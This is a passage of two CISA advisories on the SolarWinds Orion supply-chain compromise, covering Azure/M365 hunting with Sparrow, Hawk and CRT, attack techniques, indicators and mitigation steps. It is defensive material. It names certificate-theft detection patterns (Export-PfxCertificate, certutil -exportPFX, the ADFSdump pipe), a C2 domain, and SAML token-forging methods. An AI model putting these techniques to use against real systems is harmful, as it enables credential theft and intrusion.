CISA notes that this license change is proactive, rather than reactive: it allows enhanced visibility and features for telemetry from the moment of integration but does not provide retroactive visibility on previous events or historical context. A properly configured SIEM can provide: Built-in tools, such as Microsoft Cloud Services and M365 applications, provide much of the same visibility available from custom tools and are mapped to the MITRE ATT&CK framework and easy-to-understand dashboards.[14] However, these tools often do not have the ability to pull historical data older than seven days. Therefore, storage solutions that appropriately meet governance standards and usability metrics for analysts for the SIEM must be carefully planned and arranged. Ingest comma separated values (CSV) output from the Sparrow PowerShell script into Splunk. Sparrow output will have the following default filenames, which should not be modified: AppUpdate_Operations_Export.csv,AppRoleAssignment_Operations_Export.csv, Consent_Operations_Export.csv, Domain_List.csv, Domain_Operations_Export.csv, FileItems_Operations_Export.csv, MailItems_Operations_Export.csv, PSLogin_Operations_Export.csv, PSMailbox_Operations_Export.csv, SAMLToken_Operations_Export.csv, ServicePrincipal_Operations_Export.csv Copy and paste the contents of the .xml file (aviary.xml in the root directory) into a new dashboard. Use the data selection filters to point to the indexed Sparrow data (see figure 1)    Investigate high-value administrative accounts to detect anomalous or unusual activity (Global Admins). Enable PowerShell logging, and evaluate PowerShell activity in the environment not used for traditional or expected purposes. PowerShell logging does not reveal the exact cmdlet that was run on the tenant. Look for users with unusual sign-in locations, dates, and times. Check permissions of service principals and applications in M365/Azure AD. Detect the frequency of resource access from unusual places. Use the tool to pivot to a trusted application and see if it is accessing mail or file items. Review mailbox rules and recent mailbox rule changes. Sparrow differs from CRT by looking for specific indicators of compromise associated with the recent attacks. CRT focuses on the tenant’s Azure AD permissions and Exchange Online configuration settings instead of the unified audit log, which gives it a different output from Sparrow or Hawk. CRT returns the same broad scope of application/delegated permissions for service principals and applications as Hawk. As part of its investigation, Sparrow homes in on a narrow set of application permissions given to the Graph API, which is common to the recent attacks. CRT looks at Exchange Online federation configuration and federation trust, while Sparrow focuses on listing Azure AD domains. Among the items network defenders can use CRT to review are delegated permissions and application permissions, federation configurations, federation trusts, mail forwarding rules, service principals, and objects with KeyCredentials. The IP address and Activity_ID in EventCode 410 and the Activity_ID and Instance_ID in EventCode 500. Export-PfxCertificate or certutil-exportPFX in Event IDs 4103 and 4104, which may include detection of a certificate extraction technique. Deleted certificate extraction with ADFSdump performed using Sysmon Event ID 18 with the pipe name \microsoft##wid\tsql\query (exclude processes regularly making this pipe connection on the machine). Event ID 307 (The Federation Service configuration was changed), which can be correlated to relevant Event ID 510 with the same instance ID for change details (Event ID 510 with the same Instance ID could be more than one event per single Event ID 307 event). Event ID 307 (The Federation Service configuration was changed), which can be correlated to relevant Event ID 510 with the same Instance ID for change details. (Event ID 510 with the same Instance ID could be more than one event per single Event ID 307 event.) Review events, particularly searching for Configuration: Type: IssuanceAuthority where Property Value references an unfamiliar domain. Possible activity of an interrogating ADFS host by using ADFS PowerShell plugins. Look for changes in the federation trust environment that would indicate new ADFS sources. Audit the creation and use of service principal and application credentials. Sparrow will detect modifications to these credentials. Look for unusual application usage, such as dormant or forgotten applications being used again. Audit the assignment of credentials to applications that allow non-interactive sign-in by the application. Look for unexpected trust relationships that have been added to Azure AD. (Download the last 30 days of non-interactive sign-ins from the Azure portal or use Azure Sentinel.).[10] Use Hawk (and any sub-modules available) to run an investigation on a specific user. Hawk will provide IP addresses, sign-in data, and other data. Hawk can also track IP usage in concurrent login situations. Review login details for administrator accounts (e.g., high-value administrative accounts, such as Global Admins). Look for unusual sign-in locations, dates, and times. Review new token validation time periods with high values and investigate whether the changes are legitimate or a threat actor’s attempts to gain persistence. Examine highly privileged accounts; specifically using sign-in logs, look for unusual sign-in locations, dates, and times. Create a timeline for all credential changes. Monitor changes in application credentials (the script will export into csv named AppUpdate_Operations_Export). Detect service principal credentials change and service principal change (e.g., if an actor adds new permissions or expands existing permissions). Export and view this activity via the ServicePrincipal_Operations_Export. Record OAuth consent and consent to applications Export and view this record via the Consent_Operations_Export file. Investigate instances of excessive high permissions, including, but not limited to Exchange Online, Microsoft Graph, and Azure AD Graph. Review Microsoft Graph API permissions granted to service principals. Export and view this activity via the ApplicationGraphPermissions csv file. Note: Hawk can also return the full list of service principal permissions for further investigation. Review top actors and the amount of credential modifications performed. Monitor changes in application credentials. Identify manipulation of custom or third-party applications. Network defenders should review the catalog of custom or third-party vendors with applications in the Microsoft tenant and perform the above interrogation principles on those applications and trusts. Review modifications to federation trust settings. Review new token validation time periods with high values and investigate whether this was a legitimate change or an attempt to gain persistence by the threat actor. The script detects the escalation of privileges, including the addition of Service Principals (SP) to privileged roles. Export this data into csv called AppRoleAssignment_Operations_Export. In MailItemsAccessed operations, found within the Unified Audit Log (UAL), review the application ID used (requires G5 or E5 license for this specific detail). Query the specific application ID, using the Sparrow script’s app ID investigation capability to interrogate mail and file items accessed for that applicationID (Use the application ID utility for any other suspicious apps that require additional analysis.). Check the permissions of an application in M365/Azure AD using Sparrow. Hawk will return Azure_Application_Audit, and Sparrow will return ApplicationGraphPermissions. Network defenders will see the IP address that Graph API uses. Note: the Microsoft IP address may not show up as a virtual private server/anonymized endpoint. Investigate a specific service principal, if it is a user-specific user account, in Hawk. This activity is challenging to see without Azure Sentinel or manually downloading and reviewing logs from the sign-in portal. Longer term storage of log data. Cross correlation of log data with endpoint data and network data (such as those produced by ADFS servers), endpoint detection and response data, and identity provider information. Ability to query use of application connectors in Azure. Contact InformationCISA encourages recipients of this report to contribute any additional information that they may have related to this threat. For any questions related to this report, please contact CISA at 1-888-282-0870 (From outside the United States: +1-703-235-8832) central@cisa.dhs.gov (UNCLASS) us-cert@dhs.sgov.gov (SIPRNET) us-cert@dhs.ic.gov (JWICS) CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on the CISA/US-CERT homepage at http://www.us-cert.cisa.gov/. Resources Azure Active Directory Workbook to Assess Solorigate Risk: https://techcommunity.microsoft.com/t5/azure-active-directory-identity/azure-ad-workbook-to-help-you-assess-solorigate-risk/ba-p/2010718 Volexity - Dark Halo Leverages SolarWinds Compromise to Breach Organizations: https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ How to Find Activity with Sentinel: https://www.verboon.info/2020/10/monitoring-service-principal-sign-ins-with-azuread-and-azure-sentinel/ Third-Party Walkthrough of the Attack: https://dirkjanm.io/azure-ad-privilege-escalation-application-admin/ National Security Agency Advisory on Detecting Abuse of Authentication Mechanisms: https://media.defense.gov/2020/Dec/17/2002554125/-1/-1/0/AUTHENTICATION_MECHANISMS_CSA_U_OO_198854_20.PDF Microsoft 365 App for Splunk: https://splunkbase.splunk.com/app/3786/ CISA Remediation Guidance: https://us-cert.cisa.gov/ncas/alerts/aa20-352a References [1] ZDNet: A Second Hacking Group has Targeted SolarWinds Systems [2] CISA: Supply Chain Compromise [3] Microsoft SolarWinds Post-Compromise Hunting with Azure Sentinel [4] Microsoft Solorigate Resource Center [5] Advanced Audit in Microsoft 365 [6] Microsoft: Understanding “Solorigate’s” Identity IOCs [7] Detection and Hunting of Golden SAML Attack: [8] Ibid [9] Ibid [10] Microsoft: AADServicePrincipalSignInLogs [11] Microsoft: Understanding “Solorigate’s” Identity IOCs [12] Azure Active Directory Sign-in Activity Reports [13] CrowdStrike: CrowdStrike Launches Free Tool to Identify and Help Mitigate Risks in Azure Active Directory [14] Microsoft 365 App for Splunk Revisions Initial version: January 8, 2021 February 4, 2021: Removed link and section for outdated product feedback form April 8, 2021: Added Aviary Dashboard information April 15, 2021: Added Attribution Statement This product is provided subject to this Notification and this Privacy & Use policy.

  • AA20-352A: Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations
    by CISA on 17 Dicembre 2020 at 3:00 pm

    Original release date: December 17, 2020 | Last revised: April 15, 2021SummaryUpdated April 15, 2021: The U.S. Government attributes this activity to the Russian Foreign Intelligence Service (SVR). Additional information may be found in a statement from the White House. For more information on SolarWinds-related activity, go to https://us-cert.cisa.gov/remediating-apt-compromised-networks and https://www.cisa.gov/supply-chain-compromise. The Cybersecurity and Infrastructure Security Agency (CISA) is aware of compromises of U.S. government agencies, critical infrastructure entities, and private sector organizations by an advanced persistent threat (APT) actor beginning in at least March 2020. This APT actor has demonstrated patience, operational security, and complex tradecraft in these intrusions. CISA expects that removing this threat actor from compromised environments will be highly complex and challenging for organizations. (Updated January 6, 2021): One of the initial access vectors for this activity is a supply chain compromise of a Dynamic Link Library (DLL) in the following SolarWinds Orion products (see Appendix A). Note: prior versions of this Alert included a single bullet that listed two platform versions for the same DLL. For clarity, the Alert now lists these platform versions that share the same DLL version number separately, as both are considered affected versions. Orion Platform 2019.4 HF5, version 2019.4.5200.9083 Orion Platform 2020.2 RC1, version 2020.2.100.12219 Orion Platform 2020.2 RC2, version 2020.2.5200.12394 Orion Platform 2020.2, version 2020.2.5300.12432 Orion Platform 2020.2 HF1, version 2020.2.5300.12432 Note (updated January 6, 2021): CISA has evidence that there are initial access vectors other than the SolarWinds Orion platform and has identified legitimate account abuse as one of these vectors (for details refer to Initial Access Vectors section). Specifically, we are investigating incidents in which activity indicating abuse of Security Assertion Markup Language (SAML) tokens consistent with this adversary’s behavior is present, yet where impacted SolarWinds instances have not been identified. CISA is continuing to work to confirm initial access vectors and identify any changes to the tactics, techniques, and procedures (TTPs). CISA will update this Alert as new information becomes available. Refer to CISA.gov/supply-chain-compromise for additional resources. (Updated January 6, 2021): On December 13, 2020, CISA released Emergency Directive 21-01: Mitigate SolarWinds Orion Code Compromise, ordering federal civilian executive branch departments and agencies to disconnect affected devices. CISA has subsequently issued supplemental guidance to Emergency Directive (ED) 21-01, most recently on January 6, 2021. Note: this Activity Alert does not supersede the requirements of ED 21-01 or any supplemental guidance and does not represent formal guidance to federal agencies under ED 21-01. CISA has determined that this threat poses a grave risk to the Federal Government and state, local, tribal, and territorial governments as well as critical infrastructure entities and other private sector organizations. CISA advises stakeholders to read this Alert and review the enclosed indicators (see Appendix B). Key Takeaways (updated December 18, 2020) This is a patient, well-resourced, and focused adversary that has sustained long duration activity on victim networks. CISA is investigating other initial access vectors in addition to the SolarWinds Orion supply chain compromise.  Not all organizations that have the backdoor delivered through SolarWinds Orion have been targeted by the adversary with follow-on actions. Organizations with suspected compromises need to be highly conscious of operational security, including when engaging in incident response activities and planning and implementing remediation plans.  (Updated January 8, 2021) For a downloadable list of indicators of compromise (IOCs), see the STIX file. (Updated April 15, 2021) See the following Malware Analysis Reports (MARs) for additional technical details and associated IOCs: AR21-039A: MAR-10318845-1.v1 - SUNBURST AR21-039B: MAR-10320115-1.v1 - TEARDROP AR21-105A: MAR-10327841-1.v1 – SUNSHUTTLE Technical DetailsOverview CISA is aware of compromises, which began at least as early as March 2020, at U.S. government agencies, critical infrastructure entities, and private sector organizations by an APT actor. This threat actor has demonstrated sophistication and complex tradecraft in these intrusions. CISA expects that removing the threat actor from compromised environments will be highly complex and challenging. This adversary has demonstrated an ability to exploit software supply chains and shown significant knowledge of Windows networks. It is likely that the adversary has additional initial access vectors and TTPs that have not yet been discovered. CISA will continue to update this Alert and the corresponding IOCs as new information becomes available. Initial Infection Vectors [TA0001] (Updated January 6, 2021): CISA is investigating incidents that exhibit adversary TTPs consistent with this activity, including some where victims either do not leverage SolarWinds Orion or where SolarWinds Orion was present but where there was no SolarWinds exploitation activity observed. CISA incident response investigations have identified that initial access in some cases was obtained by password guessing [T1101.001], password spraying [T1101.003], and inappropriately secured administrative credentials [T1078] accessible via external remote access services [T1133]. Initial access root cause analysis is still ongoing in a number of response activities and CISA will update this section as additional initial vectors are identified. Volexity has also reported publicly that they observed the APT using a secret key that the APT previously stole in order to generate a cookie to bypass the Duo multi-factor authentication (MFA) protecting access to Outlook Web App (OWA).[1] Volexity attributes this intrusion to the same activity as the SolarWinds Orion supply chain compromise, and the TTPs are consistent between the two. This observation indicates that there are other initial access vectors beyond SolarWinds Orion, and there may still be others that are not yet known. SolarWinds Orion Supply Chain Compromise [T1195.002] SolarWinds Orion is an enterprise network management software suite that includes performance and application monitoring and network configuration management along with several different types of analyzing tools. SolarWinds Orion is used to monitor and manage on-premise and hosted infrastructures. To provide SolarWinds Orion with the necessary visibility into this diverse set of technologies, it is common for network administrators to configure SolarWinds Orion with pervasive privileges, making it a valuable target for adversary activity. The threat actor has been observed leveraging a software supply chain compromise of SolarWinds Orion products[2] (see Appendix A). The adversary added a malicious version of the binary solarwinds.orion.core.businesslayer.dll into the SolarWinds software lifecycle, which was then signed by the legitimate SolarWinds code signing certificate. This binary, once installed, calls out to a victim-specific avsvmcloud[.]com domain using a protocol designed to mimic legitimate SolarWinds protocol traffic. After the initial check-in, the adversary can use the Domain Name System (DNS) response to selectively send back new domains or IP addresses for interactive command and control (C2) traffic. Consequently, entities that observe traffic from their SolarWinds Orion devices to avsvmcloud[.]com should not immediately conclude that the adversary leveraged the SolarWinds Orion backdoor. Instead, additional investigation is needed into whether the SolarWinds Orion device engaged in further unexplained communications. If additional Canonical Name record (CNAME) resolutions associated with the avsvmcloud[.]com domain are observed, possible additional adversary action leveraging the backdoor has occurred. Based on coordinated actions by multiple private sector partners, as of December 15, 2020, avsvmcloud[.]com resolves to 20.140.0[.]1, which is an IP address on the Microsoft blocklist. This negates any future use of the implants and would have caused communications with this domain to cease. In the case of infections where the attacker has already moved C2 past the initial beacon, infection will likely continue notwithstanding this action. SolarWinds Orion typically leverages a significant number of highly privileged accounts and access to perform normal business functions. Successful compromise of one of these systems can therefore enable further action and privileges in any environment where these accounts are trusted. Anti-Forensic Techniques The adversary is making extensive use of obfuscation to hide their C2 communications. The adversary is using virtual private servers (VPSs), often with IP addresses in the home country of the victim, for most communications to hide their activity among legitimate user traffic. The attackers also frequently rotate their “last mile” IP addresses to different endpoints to obscure their activity and avoid detection. FireEye has reported that the adversary is using steganography (Obfuscated Files or Information: Steganography [T1027.003]) to obscure C2 communications.[3] This technique negates many common defensive capabilities in detecting the activity. Note: CISA has not yet been able to independently confirm the adversary’s use of this technique. According to FireEye, the malware also checks for a list of hard-coded IPv4 and IPv6 addresses—including RFC-reserved IPv4 and IPv6 IP—in an attempt to detect if the malware is executed in an analysis environment (e.g., a malware analysis sandbox); if so, the malware will stop further execution. Additionally, FireEye analysis identified that the backdoor implemented time threshold checks to ensure that there are unpredictable delays between C2 communication attempts, further frustrating traditional network-based analysis. While not a full anti-forensic technique, the adversary is heavily leveraging compromised or spoofed tokens for accounts for lateral movement. This will frustrate commonly used detection techniques in many environments. Since valid, but unauthorized, security tokens and accounts are utilized, detecting this activity will require the maturity to identify actions that are outside of a user’s normal duties. For example, it is unlikely that an account associated with the HR department would need to access the cyber threat intelligence database. Taken together, these observed techniques indicate an adversary who is skilled, stealthy with operational security, and is willing to expend significant resources to maintain covert presence. Privilege Escalation and Persistence [TA0004, TA0003] (Updated January 6, 2021): The adversary has been observed using multiple persistence mechanisms across a variety of intrusions. CISA has observed the threat actor adding authentication credentials, in the form of assigning tokens and certificates, to existing Azure/Microsoft 365 (M365) application service principals. These additional credentials provide persistence and escalation mechanisms and a programmatic method of interacting with the Microsoft Cloud tenants (often with Microsoft Graph Application Programming Interface [API]) to access hosted resources without significant evidence or telemetry being generated. (Updated January 6, 2021): Microsoft reported that the actor has added new federation trusts to existing on-premises infrastructure, a technique that CISA believes was utilized by a threat actor in an incident to which CISA has responded. Where this technique is used, it is possible that authentication can occur outside of an organization’s known infrastructure and may not be visible to the legitimate system owner. Microsoft has released a query to help identify this activity, as well as a Sentinel detection for identifying changes to the identity federation from a user or application.[4] User Impersonation (Updated January 6, 2021): The adversary’s initial objectives, as understood today, appear to be to collect information from victim environments. One method the adversary is accomplishing this objective is by compromising the SAML signing certificate using their escalated Active Directory privileges. Once this is accomplished, the adversary creates unauthorized but valid tokens and presents them to services that trust SAML tokens from the environment. These tokens can then be used to access resources in hosted environments, such as email, for data exfiltration via authorized APIs. During the persistence phase, the additional credentials being attached to service principals obfuscates the activity of user objects, because they appear to be accessed by the individual, and such individual access is normal and not logged in all M365 licensing levels. CISA has observed in its incident response work adversaries targeting email accounts belonging to key personnel, including IT and incident response personnel. These are some key functions and systems that commonly use SAML. Hosted email services Hosted business intelligence applications Travel systems Timecard systems File storage services (such as SharePoint and OneDrive) (New January 6, 2021): Detection: Identifying Compromised Azure/M365 Resources CISA created Sparrow.ps1[5] to help detect possible compromised accounts and applications in the Azure/M365 environment. Sparrow is intended for use by incident responders and focuses on the narrow scope of user and application activity endemic to identity- and authentication-based attacks seen recently in multiple sectors. It is neither comprehensive nor exhaustive of available data and is intended to narrow a larger set of available investigation modules and telemetry to those specific to recent intrusions on federated identity sources and applications. Sparrow can be found on CISA’s GitHub page at https://github.com/cisagov/Sparrow. Detection: Impossible Logins The adversary is using a complex network of IP addresses to obscure their activity, which can result in a detection opportunity referred to as “impossible travel.” Impossible travel occurs when a user logs in from multiple IP addresses that are a significant geographic distance apart (i.e., a person could not realistically travel between the geographic locations of the two IP addresses during the time period between the logins). Note: implementing this detection opportunity can result in false positives if legitimate users apply virtual private network (VPN) solutions before connecting into networks. Detection: Impossible Tokens The following conditions may indicate adversary activity. (Updated January 6, 2021): Most organizations have SAML tokens with 1-hour validity periods. Long SAML token validity durations, such as 24 hours, could be unusual. Exact values (measured in precise seconds) is also considered unusual. The SAML token contains different timestamps, including the time it was issued and the last time it was used. A token having the same timestamp for when it was issued and when it was used is not indicative of normal user behavior as users tend to use the token within a few seconds but not at the exact same time of issuance. A token that does not have an associated login with its user account within an hour of the token being generated also warrants investigation. (New January 6, 2021): Tokens with missing or unusual MFA details, when MFA is enforced, is considered an anomaly and should be investigated. This requires correlation of identity provider (iDP) logs with cloud access; differences in claims indicate manipulated values. All claims should have a corresponding iDP entry. (New December 21, 2020): see the National Security Agency (NSA) Cybersecurity Advisory: Detecting Abuse of Authentication Mechanisms for additional detection methods as well as mitigation recommendations. Operational Security Due to the nature of this pattern of adversary activity—and the targeting of key personnel, incident response staff, and IT email accounts—discussion of findings and mitigations should be considered very sensitive, and should be protected by operational security measures. An operational security plan needs to be developed and socialized, via out-of-band communications, to ensure all staff are aware of the applicable handling caveats. Operational security plans should include: Out-of-band communications guidance for staff and leadership; An outline of what “normal business” is acceptable to be conducted on the suspect network; A call tree for critical contacts and decision making; and Considerations for external communications to stakeholders and media. MITRE ATT&CK® Techniques CISA assesses that the threat actor engaged in the activities described in this Alert uses the below-listed ATT&CK techniques. Query Registry [T1012] Obfuscated Files or Information [T1027] Obfuscated Files or Information: Steganography [T1027.003] Process Discovery [T1057] Indicator Removal on Host: File Deletion [T1070.004] Application Layer Protocol: Web Protocols [T1071.001] Application Layer Protocol: DNS [T1071.004] File and Directory Discovery [T1083] Ingress Tool Transfer [T1105] Data Encoding: Standard Encoding [T1132.001] Supply Chain Compromise: Compromise Software Dependencies and Development Tools [T1195.001] Supply Chain Compromise: Compromise Software Supply Chain [T1195.002] Software Discovery [T1518] Software Discovery: Security Software [T1518.001] Create or Modify System Process: Windows Service [T1543.003] Subvert Trust Controls: Code Signing [T1553.002] Dynamic Resolution: Domain Generation Algorithms [T1568.002] System Services: Service Execution [T1569.002] Compromise Infrastructure [T1584] Mitigations(Updated January 6, 2021) SolarWinds Orion Owners Networks with SolarWinds Orion products will generally fall into one of three categories. (Note: for the purposes of mitigation analysis, a network is defined as any computer network with hosts that share either a logical trust or any account credentials with SolarWinds Orion.) Category 1 includes those who do not have the identified malicious binary code on their network and can forensically confirm that the binary was never present on their systems. This includes networks that do not, and never did, utilize the affected versions of SolarWinds Orion products (see Appendix A). Category 2 includes networks where the presence of the malicious binary has been identified—with or without beaconing to avsvmcloud[.]com. This includes networks that previously utilized affected versions of SolarWinds Orion but where the organization has forensically verified (through comprehensive network monitoring and analysis) that platforms running the affected software either:   Had no beaconing, or Only beaconed to avsvmcloud[.]com and have not had any secondary C2 activity to a separate domain or IP address or other adversary activity or secondary actions on objectives (AOOs),[6] such as SAML token abuse.   Category 2 organizations, after conducting appropriate forensic analysis to ensure they only have Category 2 activity, can rebuild the platform, harden the configuration based on SolarWinds secure configuration guidelines, and resume use as determined by and consistent with their thorough risk evaluation. For entities not subject to ED 21-01, this can be accomplished by following the steps below. Federal agencies subject to ED 21-01 must follow the appropriate steps as outlined in the effective ED 21-01 supplemental guidance.   Denying all incoming and outgoing (any:any) communications outside of the organization’s device network management enclave, with additional assurance that communications to the public internet to and from hosts running SolarWinds Orion products has been blocked. Cloud instances of Orion should only monitor cloud resources in that cloud infrastructure. On-premises instances of Orion should not be permissioned with any cloud/hosted identity accounts. Restoration of SolarWinds may be done from the legacy database following the SolarWinds restore guidance (http://solarwinds.com/upgrading-your-environment). Restoration for affected versions will differ from restoration for unaffected versions—agencies must ensure that they are following the correct restoration guidance. Before building SolarWinds: All account credentials, or other shared secrets (e.g., Simple Network Management Protocol [SNMP] strings) that are or had been utilized by the affected SolarWinds Orion device being rebuilt should be changed. Enable MFA for these credentials, whenever possible. Provide service accounts with the minimum privilege necessary for the role performed, whenever possible. For accounts where MFA is not possible  (e.g., service accounts), use randomly generated long and complex passwords (greater than 25 characters) and implement a maximum 90-day rotation policy for these passwords. Remove all inbound trust relationships to the SolarWinds Orion device being rebuilt. Re-building a SolarWinds Orion Platform to at least version 2020.2.1 HF2 and updating the host to the latest supported build, at least Windows 2016. Following the SolarWinds secure configuration (hardening) guidelines provided by the vendor, which can be found at: https://documentation.solarwinds.com/en/Success_Center/orionplatform/content/core-secure-configuration.htm. CISA does not recommend configuring the SolarWinds software to implement SAML-based authentication that relies on Microsoft’s Active Directory Federated Services if it has not already been configured to leverage SAML. This configuration is currently being exploited by the threat actor with this activity. Configuring logging to ensure that all logs on the host operating system and SolarWinds platform are being captured and stored for at least 180 days. Configure logging to ensure that all logs from the host OS, SolarWinds platform, and associated network logs are being captured and stored for at least 180 days in a separate, centralized log aggregation capability. Implementing subsequent SolarWinds Orion Platform updates. CISA recommends installing all updates within 48 hours of release.    Category 3 includes those networks that used affected versions of SolarWinds Orion and have evidence of follow-on threat actor activity, such as binary beaconing to avsvmcloud[.]com and secondary C2 activity to a separate domain or IP address (typically but not exclusively returned in avsvmcloud[.]com CNAME responses). Additionally, organizations that have observed communications with avsvmcloud[.]com that appear to suddenly cease prior to December 14, 2020—not due to an action taken by their network defenders—fall into this category. Assume the environment has been compromised, and initiate incident response procedures immediately. Recovery and remediation of Category 3 activity requires a complex reconstitution and mitigation plan, which may include comprehensively rebuilding the environment. This should be coordinated with an organization’s leadership and incident response team. Compromise Mitigations (Updated January 6, 2021): If the adversary has compromised administrative level credentials in an environment—or if organizations identify SAML abuse in the environment, simply mitigating individual issues, systems, servers, or specific user accounts will likely not lead to the adversary’s removal from the network. In such cases, organizations should consider the entire identity trust store as compromised. In the event of a total identity compromise, a full reconstitution of identity and trust services is required to successfully remediate. In this reconstitution, it bears repeating that this threat actor is among the most capable, and in many cases, a full rebuild of the environment is the safest action. A Microsoft blog post, Advice for incident responders on recovery from systemic identity compromises outlines processes and procedures needed to remediate this type of activity and retain administrative control of an environment. In addition to the recommendations in this blog post, CISA recommends the following actions: Take actions to remediate kerberoasting, including, as necessary or appropriate, engaging with a 3rd party with experience eradicating APTs from enterprise networks. For Windows environments, refer to the following: See Microsoft’s documentation on kerberoasting: https://techcommunity.microsoft.com/t5/microsoft-security-and/detecting-ldap-based-kerberoasting-with-azure-atp/ba-p/462448. Change all account credentials, or other shared secrets (e.g., SNMP strings) that were potentially exposed: Enable MFA for these credentials, whenever possible; Provide service accounts with the minimum level of privilege necessary for the role performed, whenever possible; and For accounts where MFA is not possible, require use of randomly generated long and complex passwords (greater than 25 characters) and implement a maximum 90-day rotation policy for these passwords. Replace the user accounts with a Group Managed Service Account (gMSA). See https://docs.microsoft.com/en-us/windows-server/security/group-managed-service-accounts/group-managed-service-accounts-overview, and Implement Group Managed Service Accounts: https://docs.microsoft.com/en-us/windows-server/security/group-managed-service-accounts/group-managed-service-accounts-overview. Set account options for service accounts to support AES256_CTS_HMAC_SHA1_96 and not support DES, RC4, or AES128 bit encryption Define the Security Policy setting, for Network Security: Configure Encryption types allowed for Kerberos. Set the allowable encryption types to AES256_HMAC_SHA1 and Future encryption types. https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-configure-encryption-types-allowed-for-kerberos See Microsoft’s documentation on how to reset the Kerberos Ticket Granting Ticket password, twice: https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password. SolarWinds Orion Specific Mitigations The following mitigations apply to networks using the SolarWinds Orion product. This includes any information system that is used by an entity or operated on its behalf. Organizations that have the expertise to take the actions in Step 1 immediately should do so before proceeding to Step 2. Organizations without this capability should proceed to Step 2. Federal civilian executive branch agencies should ignore the below and refer instead to Emergency Directive 21-01 (and forthcoming associated guidance) for mitigation steps. Step 1 Forensically image system memory and/or host operating systems hosting all instances of affected versions of SolarWinds Orion. Analyze for new user or service accounts, privileged or otherwise. Analyze stored network traffic for indications of compromise, including new external DNS domains to which a small number of agency hosts (e.g., SolarWinds systems) have had connections. Step 2 Affected organizations should immediately disconnect or power down affected all instances of affected versions of SolarWinds Orion from their network. Additionally: Block all traffic to and from hosts, external to the enterprise, where any version of SolarWinds Orion software has been installed. Identify and remove all threat actor-controlled accounts and identified persistence mechanisms.   Step 3   Only after all known threat actor-controlled accounts and persistence mechanisms have been removed: Treat all hosts monitored by the SolarWinds Orion monitoring software as compromised by threat actors and assume that the threat actor has deployed further persistence mechanisms. Rebuild hosts monitored by the SolarWinds Orion monitoring software using trusted sources. Reset all credentials used by or stored in SolarWinds software. Such credentials should be considered compromised. (New December 19, 2020) For all network devices (routers, switches, firewalls, etc.) managed by affected SolarWinds servers that also have indications of additional adversary activity, CISA recommends the following steps: Device configurations Audit all network device configurations, stored or managed on the SolarWinds monitoring server, for signs of unauthorized or malicious configuration changes. Audit the configurations found on network devices for signs of unauthorized or malicious configuration changes. Organizations should ensure they audit the current network device running configuration and any local configurations that could be loaded at boot time. Credential and security information reset Change all credentials being used to manage network devices, to include keys and strings used to secure network device functions (SNMP strings/user credentials, IPsec/IKE preshared keys, routing secrets, TACACS/RADIUS secrets, RSA keys/certificates, etc.). Firmware and software validation Validate all network device firmware/software which was stored or managed on the SolarWinds monitoring server. Cryptographic hash verification should be performed on such firmware/software and matched against known good hash values from the network vendor. CISA recommends that, if possible, organizations download known good versions of firmware. For network devices managed by the SolarWinds monitoring server, the running firmware/software should be checked against known good hash values from the network vendor. CISA recommends that, if possible, organizations re-upload known good firmware/software to managed network devices and perform a reboot. See Joint Alert on Technical Approaches to Uncovering and Remediating Malicious Activity for more information on incident investigation and mitigation steps based on best practices. CISA will update this Alert, as information becomes available and will continue to provide technical assistance, upon request, to affected entities as they work to identify and mitigate potential compromises. Contact InformationCISA encourages recipients of this report to contribute any additional information that they may have related to this threat. For any questions related to this report, please contact CISA at 1-888-282-0870 (From outside the United States: +1-703-235-8832) central@cisa.dhs.gov (UNCLASS) us-cert@dhs.sgov.gov (SIPRNET) us-cert@dhs.ic.gov (JWICS) CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on the CISA/US-CERT homepage at http://www.us-cert.cisa.gov/. Appendix A: Affected SolarWinds Orion Products Table 1 identifies recent versions of SolarWinds Orion Platforms and indicates whether they have been identified as having the Sunburst backdoor present. (Updated January 6, 2021: added SHA-1 and MD5 hashes to table 1; updated SHA-256 hash for version 2019.4 HF6). Table 1: Affected SolarWinds Orion Products Orion Platform Version Sunburst Backdoor Code Present File Version SHA-256 SHA-1 MD5 2019.4 Tampered but not backdoored 2019.4.5200.8890 a25cadd48d70f6ea0c4a241d99c5241269e6faccb4054e62d16784640f8e53bc 5e643654179e8b4cfe1d3c1906a90a4c8d611cea e18a6a21eb44e77ca8d739a72209c370 2019.4 HF1 No 2019.4.5200.8950 9bee4af53a8cdd7ecabe5d0c77b6011abe887ac516a5a22ad51a058830403690 48e84a1ed30d36f6750bce8748fe0edbfa9fb3dc b3f7ac8215b73e73e1e184933c788759 2019.4 HF2 No 2019.4.5200.8996 bb86f66d11592e3312cd03423b754f7337aeebba9204f54b745ed3821de6252d 162bb92a18bb39ac7e9a9997369a6efe0dd74094 563d4d55eae72710f9419975d087fd11 2019.4 HF3 No 2019.4.5200.9001 ae6694fd12679891d95b427444466f186bcdcc79bc0627b590e0cb40de1928ad 98bb0c5d1a711472225dc1194133f37c80159664 d22e80d03fe69389cbf3299f6f800f80 2019.4 HF4 No 2019.4.5200.9045 9d6285db647e7eeabdb85b409fad61467de1655098fec2e25aeb7770299e9fee 2a255070160b1c6fcad4f0586b64691fe8b6d0f8 6b5f205d79a647b275500597975314a5 2020.2 RC1 Yes 2020.2.100.12219 dab758bf98d9b36fa057a66cd0284737abf89857b73ca89280267ee7caf62f3b 1acf3108bf1e376c8848fbb25dc87424f2c2a39c 731d724e8859ef063c03a8b1ab7f81ec 2019.4 HF5 Yes 2019.4.5200.9083 32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77 76640508b1e7759e548771a5359eaed353bf1eec b91ce2fa41029f6955bff20079468448 2020.2 RC2 Yes 2020.2.5200.12394 019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134 2f1a5a7411d015d01aaee4535835400191645023 2c4a910a1299cdae2a4e55988a2f102e 2020.2 2020.2 HF1 Yes 2020.2.5300.12432 ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6 d130bd75645c2433f88ac03e73395fba172ef676 846e27a652a5e1bfbd0ddd38a16dc865 2019.4 HF6 No 2019.4.5200.9106 8dfe613b00d495fb8905bdf6e1317d3e3ac1f63a626032fa2bdad4750887ee8a 